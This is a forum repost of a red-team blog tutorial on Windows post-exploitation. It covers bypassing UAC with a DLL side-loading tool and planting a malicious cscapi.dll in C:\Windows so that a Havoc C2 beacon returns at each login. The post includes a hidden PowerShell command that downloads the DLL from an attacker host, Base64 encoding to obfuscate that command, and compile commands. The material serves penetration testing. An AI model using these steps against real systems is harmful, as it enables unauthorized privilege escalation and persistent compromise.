Jump to content
Nytro

Home Grown Red Team: Bypassing Applocker, UAC, and Getting Administrative Persistence

Recommended Posts

Posted

Jan 20

 

Home Grown Red Team: Bypassing Applocker, UAC, and Getting Administrative Persistence

 

1*4jR-qOHQ3hZkJi-s6dnpmQ.png

Welcome back! In my previous post, I showed how we can bypass default Applocker rules using LNK files to get a Havoc beacon.

In this installment, we’re going to bypass UAC and gain administrative persistence on a target without dropping EXEs to disk. Pretty cool, right?

Getting Started

If you haven’t read my previous post, you can find it here: Bypassing Applocker Using LNK Files. That post is going to show you how to set up your Powershell scripts, LNK file and so forth for initial access to the target.

Since we still have access to our target, we’re going to start where we ended in our last article.

Here’s the scenario:

We have an administrative beacon in medium integrity through Havoc C2.

 

1*a4dg-JwSmFLWJFrS0ehkzA.png

You’ll notice that the process is Powershell. If we had used process injection in our shellcode dropper, we would have migrated to a different process like Explorer.exe or ApplicationFrameHost.exe (just something to think about).

Running a “whoami” we see that our user, david, is part of the administrators group.

 

1*ZCv_34PiCk8pDKUCr_zT4g.png

In order for our persistence method to work, we need local admin. The reason being that we need access to “C:\Windows\” and this isn’t accessible to domain users or administrators unless we are in a high integrity beacon/process.

So since this user is an admin, we can perform a UAC bypass. For this task, I prefer to use my own tool, HighBorn.

HighBorn utilizes the Windows mock directory vulnerability to side load a DLL and execute it in high integrity.

Using A UAC Bypass To Perform Administrative Actions

A typical UAC Bypass is performed to get a high integrity beacon back to a C2. However, we can use HighBorn to perform administrative tasks on execution instead of getting a high integrity beacon.

Let’s discuss the typical UAC Bypass to get a beacon back to Havoc. This is the usual workflow:

  1. Target downloads malicious EXE .

2. We run HighBorn in memory using inline-execute.

3. HighBorn performs the UAC Bypass and calls the EXE in high integrity.

4. We get a high integrity beacon.

Since we are bypassing Applocker protections, we don’t have a dropper on disk. Remember, our beacon is running through a Powershell process.

The UAC Bypass performs administrative code execution so we can tailor this to our needs. Since our need for this POC is persistence, we can change our execution from calling a malicious EXE to downloading a malicious DLL.

DLL Side Loading For Persistence

I’ve seen a few posts on this, mainly on LinkedIn, but there is a pretty popular DLL side loading vulnerability in Windows File Explorer. If you craft a malicious DLL and name it cscapi.dll, you can place it in C:\Windows\ and it will get executed when the user logs in.

The caveat to this is that you must have local admin privileges to gain access to C:\Windows\.

So let’s begin by creating a malicious DLL.

Creating The Malicious DLL

To create a malicious DLL, I prefer to use my own tool, Harriet.

 

1*WZHD-F-w6Ci-FTUwIkK0Nw.png

We choose option 2 to create our DLL.

 

1*TUEo5ML0BVRzaGoVP76gGQ.png

We then choose option 1 (the only option for now) and then we input all of our values.

 

1*XBM5iv9AermAUdpycdMbGQ.png

I chose to inject into Explorer.exe (you might want to change this process if you’re on a real pentest) and I named my DLL appropriately for the exploit.

Modifying HighBorn.cs For Administrative Actions

Now we need to craft a command to call out to cscapi.dll and download it into C:\Windows\. This is where HighBorn comes in.

I navigate to the HighBorn folder and edit the HighBorn.c file.

 

1*A3kX50NZMfHi1B44oEMYnQ.png

As you can see from the screenshot, this is a very simple DLL. We can use a easy Powershell command to download our cscapi.dll file into the Windows folder.

powershell -Sta -Nop -Window Hidden iwr -Uri ‘http://IP:PORT/cscapi.dll' -Outfile ‘C:\Windows\cscapi.dll’

However, if we try to compile this, we get escape sequence errors. Let’s encode our command into Base64 using Powershell.

$str= “powershell -Sta -Nop -Window Hidden iwr -Uri ‘http://IP:PORT/cscapi.dll' -Outfile ‘C:\Windows\cscapi.dll’

[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

Now we should have a good Base64 string. Let’s add it to HighBorn.c file.

 

1*866Wf8dGK5Ng0SKAg3FBiA.png

We then compile it per the command in the ReadMe.md file in the HighBorn folder.

x86_64-w64-mingw32-gcc -shared -o secur32.dll HighBorn.c -lcomctl32 -Wl, — subsystem,windows

Now we have a secur32.dll file. In the HighBorn.cs file, we modify the exploit to put our IP and port to pull secur32.dll.

 

1*u0wcHSWiurWdCZk26xCQUw.png

Then we can compile HighBorn.exe with this command.

mcs HighBorn.cs /out:HighBorn.exe

We host secur32.dll and run our command in Havoc.

 

1*46BGbHIzf7dei5hdmB6XmA.png

On our python server, we see it pull secur32.dll and then it pulls our cscapi.dll file!

 

1*j9HhT7krTzOA-vOZ6Fwf3w.png

Moving to our Windows folder on the target, we see that it has our DLL in place.

 

1*kEwh01SFoI49QRsisA3ikA.png

Now remember, our cscapi.dll is a malicious DLL that will inject shellcode into Explorer.exe on login. Let’s reboot the target and see if we get a shellback.

If all goes well, we should get a beacon in the Explorer.exe process on Havoc.

And as user david logs in, we have our beacon!

 

1*Sj3TjlGjEbWzHob3EecZbw.png

Pretty cool persistence technique!

The biggest con to this technique is that you need admin privileges.

However, if you can crack an admin password you can perform this technique on any user’s system for persistence on multiple workstations in the environment without having to drop an EXE to disk.

Hopefully you found this article helpful or at least interesting. If you like my content you can follow me on here or on Twitter @assume_breach

 

Sursa: https://assume-breach.medium.com/home-grown-red-team-bypassing-applocker-uac-and-getting-administrative-persistence-88b85c81343e

  • Thanks 1
  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...